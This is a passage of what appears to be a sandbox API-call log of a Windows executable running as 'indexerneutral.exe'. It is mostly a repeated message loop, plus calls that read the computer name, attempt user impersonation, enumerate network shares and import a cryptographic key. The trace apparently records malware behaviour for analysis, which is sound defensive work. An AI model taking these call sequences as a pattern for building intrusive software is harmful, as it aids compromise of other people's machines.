WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0267.835] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0268.838] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0268.838] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1142617 [0268.838] GetTickCount () returned 0x17d97 [0268.838] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0268.838] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0269.853] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0269.853] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1142a0f [0269.853] GetTickCount () returned 0x1818f [0269.853] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0269.853] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0270.853] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0270.853] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1142df7 [0270.854] GetTickCount () returned 0x18577 [0270.854] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0270.854] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0271.919] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0271.919] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114321d [0271.919] GetTickCount () returned 0x1899d [0271.919] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0271.919] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0272.869] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0272.869] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11435d6 [0272.869] GetTickCount () returned 0x18d56 [0272.869] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0272.869] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0273.871] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0273.871] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11439be [0273.871] GetTickCount () returned 0x1913e [0273.871] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0273.871] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0274.885] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0274.885] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1143db6 [0274.885] GetTickCount () returned 0x19536 [0274.885] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0274.885] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0275.884] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0275.884] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114419e [0275.885] GetTickCount () returned 0x1991e [0275.885] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0275.885] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0276.900] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0276.900] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1144596 [0276.900] GetTickCount () returned 0x19d16 [0276.900] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0276.900] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0277.901] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0277.901] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114497e [0277.901] GetTickCount () returned 0x1a0fe [0277.901] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0277.901] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0278.914] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0278.914] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1144d75 [0278.914] GetTickCount () returned 0x1a4f5 [0278.914] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0278.914] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0279.930] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0279.930] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114516d [0279.930] GetTickCount () returned 0x1a8ed [0279.930] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0279.930] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0280.930] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0280.930] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1145555 [0280.930] GetTickCount () returned 0x1acd5 [0280.930] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0280.930] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0281.936] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0281.936] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114593d [0281.936] GetTickCount () returned 0x1b0bd [0281.936] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0281.936] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0282.951] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0282.952] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1145d34 [0282.952] GetTickCount () returned 0x1b4b4 [0282.952] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0282.952] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0283.951] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0283.951] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114611c [0283.952] GetTickCount () returned 0x1b89c [0283.952] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0283.952] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0284.967] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0284.967] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1146514 [0284.967] GetTickCount () returned 0x1bc94 [0284.967] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0284.967] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0285.971] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0285.971] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114690c [0285.971] GetTickCount () returned 0x1c08c [0285.971] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0285.971] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0286.971] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0286.971] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1146cf4 [0286.971] GetTickCount () returned 0x1c474 [0286.971] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0286.971] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0287.976] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0287.976] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11470dc [0287.976] GetTickCount () returned 0x1c85c [0287.976] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0287.976] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0288.991] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0288.991] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11474d3 [0288.991] GetTickCount () returned 0x1cc53 [0288.991] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0288.991] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0289.991] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0289.991] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11478bb [0289.991] GetTickCount () returned 0x1d03b [0289.991] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0289.991] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0291.007] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0291.007] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1147cb3 [0291.007] GetTickCount () returned 0x1d433 [0291.007] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0291.007] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0292.022] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0292.022] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11480ab [0292.022] GetTickCount () returned 0x1d82b [0292.022] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0292.022] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0293.022] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0293.022] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1148493 [0293.022] GetTickCount () returned 0x1dc13 [0293.022] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0293.022] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0294.037] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0294.037] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114888a [0294.037] GetTickCount () returned 0x1e00a [0294.038] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0294.038] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0295.053] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0295.053] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1148c82 [0295.053] GetTickCount () returned 0x1e402 [0295.053] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0295.053] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0296.069] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0296.069] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1149079 [0296.069] GetTickCount () returned 0x1e7f9 [0296.069] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0296.069] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0297.083] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0297.083] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1149471 [0297.083] GetTickCount () returned 0x1ebf1 [0297.083] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0297.083] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0298.084] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0298.084] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1149859 [0298.084] GetTickCount () returned 0x1efd9 [0298.084] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0298.084] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0299.100] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0299.100] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1149c51 [0299.100] GetTickCount () returned 0x1f3d1 [0299.100] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0299.100] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0300.100] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0300.100] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114a039 [0300.100] GetTickCount () returned 0x1f7b9 [0300.100] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0300.100] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0301.116] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0301.116] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114a430 [0301.116] GetTickCount () returned 0x1fbb0 [0301.116] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0301.116] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0302.116] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0302.116] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114a818 [0302.116] GetTickCount () returned 0x1ff98 [0302.116] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0302.116] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0303.116] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0303.116] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114ac00 [0303.116] GetTickCount () returned 0x20380 [0303.116] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0303.116] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0304.131] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0304.131] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114aff8 [0304.131] GetTickCount () returned 0x20778 [0304.131] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0304.131] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0305.146] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0305.146] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114b3f0 [0305.146] GetTickCount () returned 0x20b70 [0305.146] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0305.146] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0306.146] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0306.146] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114b7d8 [0306.146] GetTickCount () returned 0x20f58 [0306.146] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0306.146] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0307.334] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0307.334] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114bc7b [0307.335] GetTickCount () returned 0x213fb [0307.335] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0307.335] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0308.336] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0308.336] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114c063 [0308.336] GetTickCount () returned 0x217e3 [0308.336] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0308.336] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0309.336] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0309.336] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114c44b [0309.336] GetTickCount () returned 0x21bcb [0309.336] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0309.336] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0310.336] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0310.336] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114c833 [0310.336] GetTickCount () returned 0x21fb3 [0310.336] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0310.336] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0311.352] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0311.352] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114cc2b [0311.352] GetTickCount () returned 0x223ab [0311.352] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0311.352] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0312.363] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0312.363] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114d022 [0312.363] GetTickCount () returned 0x227a2 [0312.363] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0312.363] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0313.363] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0313.363] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114d40a [0313.363] GetTickCount () returned 0x22b8a [0313.363] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0313.363] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0314.379] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0314.379] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114d802 [0314.379] GetTickCount () returned 0x22f82 [0314.379] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0314.379] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0315.379] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0315.379] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114dbea [0315.379] GetTickCount () returned 0x2336a [0315.379] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0315.379] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0316.379] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0316.379] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114dfd2 [0316.379] GetTickCount () returned 0x23752 [0316.379] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0316.379] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0317.392] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0317.392] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114e3ca [0317.393] GetTickCount () returned 0x23b4a [0317.393] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0317.393] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0318.398] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0318.398] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114e7b2 [0318.398] GetTickCount () returned 0x23f32 [0318.398] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0318.398] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0319.414] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0319.414] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114eba9 [0319.414] GetTickCount () returned 0x24329 [0319.414] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0319.414] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0320.429] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0320.429] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114efa1 [0320.429] GetTickCount () returned 0x24721 [0320.429] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0320.429] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0321.445] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0321.445] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114f398 [0321.445] GetTickCount () returned 0x24b18 [0321.445] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0321.445] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0322.454] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0322.454] DispatchMessageW (lpMsg=0x19ff2c) returned 0x114f780 [0322.454] GetTickCount () returned 0x24f00 [0322.454] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0322.454] GetMessageW (lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 502 os_tid = 0x6d4 Thread: id = 503 os_tid = 0x7b4 [0251.416] GetTickCount () returned 0x13989 [0252.440] GetTickCount () returned 0x13d90 [0252.441] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb152a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0252.441] GetComputerNameW (in: lpBuffer=0xb1522c, nSize=0xf7fc9c | out: lpBuffer="LHNIWSJ", nSize=0xf7fc9c) returned 1 [0252.450] WTSGetActiveConsoleSessionId () returned 0x1 [0252.450] QueryUserToken () returned 0x0 [0252.450] ImpersonateLoggedOnUser (hToken=0x0) returned 0 [0252.450] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xf7f5d8 | out: lphEnum=0xf7f5d8*=0x590108) returned 0x0 [0252.451] WaitForSingleObject (hHandle=0x404, dwMilliseconds=0x0) returned 0x102 [0252.451] WNetEnumResourceW (in: hEnum=0x590108, lpcCount=0xf7f5cc, lpBuffer=0x2100048, lpBufferSize=0xf7f5e8 | out: lpcCount=0xf7f5cc, lpBuffer=0x2100048, lpBufferSize=0xf7f5e8) returned 0x0 [0252.451] WaitForSingleObject (hHandle=0x404, dwMilliseconds=0x0) returned 0x102 [0252.451] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2100048, lphEnum=0xf7eef8 | out: lphEnum=0xf7eef8*=0x526fc0) returned 0x0 [0252.452] WaitForSingleObject (hHandle=0x404, dwMilliseconds=0x0) returned 0x102 [0252.452] WNetEnumResourceW (in: hEnum=0x526fc0, lpcCount=0xf7eeec, lpBuffer=0x2110050, lpBufferSize=0xf7ef08 | out: lpcCount=0xf7eeec, lpBuffer=0x2110050, lpBufferSize=0xf7ef08) returned 0x103 [0252.452] WNetCloseEnum (hEnum=0x526fc0) returned 0x0 [0252.452] WaitForSingleObject (hHandle=0x404, dwMilliseconds=0x0) returned 0x102 [0252.452] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2100068, lphEnum=0xf7eef8 | out: lphEnum=0xf7eef8*=0x526fc0) returned 0x4b8 [0276.838] WaitForSingleObject (hHandle=0x404, dwMilliseconds=0x0) returned 0x102 [0276.838] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2100088, lphEnum=0xf7eef8 | out: lphEnum=0xf7eef8*=0x526fc0) returned 0x4c6 [0276.838] WaitForSingleObject (hHandle=0x404, dwMilliseconds=0x0) returned 0x102 [0276.838] WNetEnumResourceW (in: hEnum=0x590108, lpcCount=0xf7f5cc, lpBuffer=0x2100048, lpBufferSize=0xf7f5e8 | out: lpcCount=0xf7f5cc, lpBuffer=0x2100048, lpBufferSize=0xf7f5e8) returned 0x103 [0276.841] WNetCloseEnum (hEnum=0x590108) returned 0x0 [0276.841] CloseHandle (hObject=0x0) returned 0 [0276.850] SetEvent (hEvent=0x404) returned 1 Thread: id = 504 os_tid = 0x7b8 [0253.468] GetTickCount () returned 0x14188 Thread: id = 505 os_tid = 0x7bc Thread: id = 506 os_tid = 0x7c0 Thread: id = 507 os_tid = 0x7c4 [0248.664] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364 [0248.664] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0248.664] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x77130000 [0248.665] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x74790000 [0248.665] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x74450000 [0248.665] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74160000 [0248.665] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x73f30000 [0248.665] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73f20000 [0248.666] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1228fa0 | out: lpBuffer="C:\\Windows\\TEMP\\") returned 0x10 [0248.666] GetTempFileNameW (in: lpPathName="C:\\Windows\\TEMP\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x1228fa0 | out: lpTempFileName="C:\\Windows\\TEMP\\2ECB.tmp" (normalized: "c:\\windows\\temp\\2ecb.tmp")) returned 0x2ecb [0248.667] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\2ECB.tmp" (normalized: "c:\\windows\\temp\\2ecb.tmp")) returned 1 [0248.668] CryptAcquireContextW (in: phProv=0x12291d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x12291d0*=0x52c980) returned 1 [0248.668] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x413430, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x175ff14, pcbStructInfo=0x175ff10 | out: pvStructInfo=0x175ff14, pcbStructInfo=0x175ff10) returned 1 [0248.668] CryptImportKey (in: hProv=0x52c980, 